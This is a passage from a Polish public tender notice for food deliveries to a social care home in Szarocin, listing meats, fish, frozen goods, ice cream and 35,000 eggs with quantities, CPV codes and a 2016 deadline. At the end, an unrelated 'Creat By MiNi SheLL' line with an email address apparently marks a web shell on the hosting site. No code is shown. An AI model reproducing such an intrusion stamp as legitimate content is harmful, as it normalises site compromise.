19 Parówki drobiowe	100kg;
20 Parówka z szynki	80kg;
21 Polędwica drobiowa	80kg;
22 Polędwica z warzywami	150kg;
23 Kiełbasa parówkowa serdelki	400kg;
24 Kiełbasa parówkowa cienka	250kg;
25 Kiełbasa śląska	700kg;
26 Kiełbasa grilowa	100kg;
27 Kiełbasa szynkowa	80kg;
28 Kiełbasa szynkowa drobiowa	60kg;
29 Kiełbasa wiejska	50kg;
30 Kiełbasa mielonka	150kg;
31 Kiełbasa sucha	20kg;
32 Kiełbasa zwyczajna	150kg;
33 Kiełbasa krakowska	60kg;
34 Kiełbasa mortadela	250kg;
35 Kiełbasa piwna	30kg;
36 Kiełbasa podwawelska	50kg;
37 Kiełbasa biała parzona 70kg;
38 Kiełbasa biała surowa 50kg;
39 Kiełbasa krakowska podsuszana drobiowa 20kg;
40 Kiełbasa żywiecka	100kg;
41 Kiełbasa golonkowa	50kg;
42 Kiełbasa jałowcowa	150kg;
43 Kiełbasa polska pieczona 20kg;
44 Schab wędzony	20kg;
45 Schab z pieca	20kg;
46 Schab pieczony	20kg;
47 Polędwica sopocka	80kg;
48 Mielonka tyrolska	50kg;
49 Ogonówka wędzona	50kg;
50 Baleron	30kg;
51 Filet wędzony drobiowy 20kg;
52 Pierś wędzona z indyka 20kg;
53 Filet z piersi indyka	20kg;
54 Boczek surowy	120kg;
55 Boczek wędzony	80kg;
56 Boczek faszerowany	30kg;
57 Rolada boczkowa	20kg;
58 Szynka gotowana	70kg;
59 Szynka typu z pieca	30kg;
60 Szynka typu krucha	100kg;
61 Szynka drobiowa prasowana	20kg;
62 Salceson drobiowy z kurczaka	30kg;
63 Salceson drobiowy z indyka	30kg;
64 Salceson wieprzowy włoski	80kg;
65 Salceson typu królewski	40kg;
66 Salceson ozorkowy	20kg;
67 Kaszanka z podrobami	100kg;
68 Kaszanka grilowa	50kg;
69 Krupniok	50kg;
71 Pieczeń wieprzowa	100kg;
72 Pieczeń ala kaczka	20kg;
73 Pasztet typu firmowy	20kg;
74 Pasztet zapiekany	20kg;
75 Pasztetowa drobiowa	150kg;
76 Pasztetowa firmowa	40kg;
77 Pieczeń tyrolska	30kg;
78 Słonina świeża bez skóry	120kg;
79 Smalec	120kg;
80 Żołądki drobiowe świeże	40kg;
81 Żołądki z indyka świeże	30kg;
82 Serca z kurczaka świeże	30kg;
83 Serca z indyka świeże	30kg;
84 Flaki wołowe gotowane w całości	100kg;
85 Kości wędzone wieprzowe	150kg;
86 Pachwina wędzona	60kg;
87 Szynka konserwowa prasowana	50kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Ryby,  mrożonki i przetwory warzywno owocowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa żywności na potrzeby Domu Pomocy Społecznej w Szarocinie, jak poniżej:
1 Filet z pangi mrozony do 10% glazury	50kg;
2 Filet z morszczuka mrożony SHP bez glazury	100kg;
3 Filet z soli mrożony do 15% glazury	250kg;
4 Filet z dorsza mrożony SHP, bez glazury	200kg;
5 Filet z tilapii mrożony do 25 % glazury	250kg;
6 Miruna mrożona filet SHP, bez glazury	100kg;
7 Filet z mintaja mrożony SHP, bez glazury	100kg;
8 Śledź ala Matjas	200kg;
9 Śledź po kaszubsku po 2,5kg	50kg;
10 Śledź po wiejsku po 2,5kg	50kg;
11 Śledź po myśliwsku po 2,5kg	50kg;
12 Pyzy z mięsem	200kg;
13 Pyzy ziemniaczane	400kg;
14 Kluski śląskie z mięsem	80kg;
15 Knedle z truskawkami	120kg;
16 Mrożonka wiosenna 7 skład.	450kg;
17 Mrożonka włoszczyzna paski	800kg;
18 Mrożonka bukiet warzyw	500kg;
19 Mrożonka kompotowa	800kg;
20 Kalafior mrożony	200kg;
21 Truskawka mrożona	300kg;
22 Fasola mrożona szparagowa	300kg;
23 Lody różne na patyku po 50ml	500szt.;
24 Lody różne na patyku po 110ml 500szt.;
25 Lody różne rożek po 110ml	500szt.;
26 Lody różne w kubku po 200ml	500szt.;
27 Lody różne po 5l	60kg;
28 Brukselka mrożona	40kg;
29 Pierogi z serem	200kg;
30 Pierogi ruskie	200kg;
31 Tłuszcz FRYTURA	40kg;
32 Szczaw konserwowy po 320g	100kg;
33 Jabłka prażone szarlotka 11kg	300kg;
34 Margaryna w płynie po 3,7l	45l;
35 Ćwiartka z kurczaka mrożona	200kg;
36 Koncentrat owocowy po 5l (Kanister) bez syntetycznych barwników i substancji słodzących	250l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa żywności na potrzeby Domu Pomocy Społecznej w Szarocinie, jak poniżej:
1 Jaja kurze L	35000szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com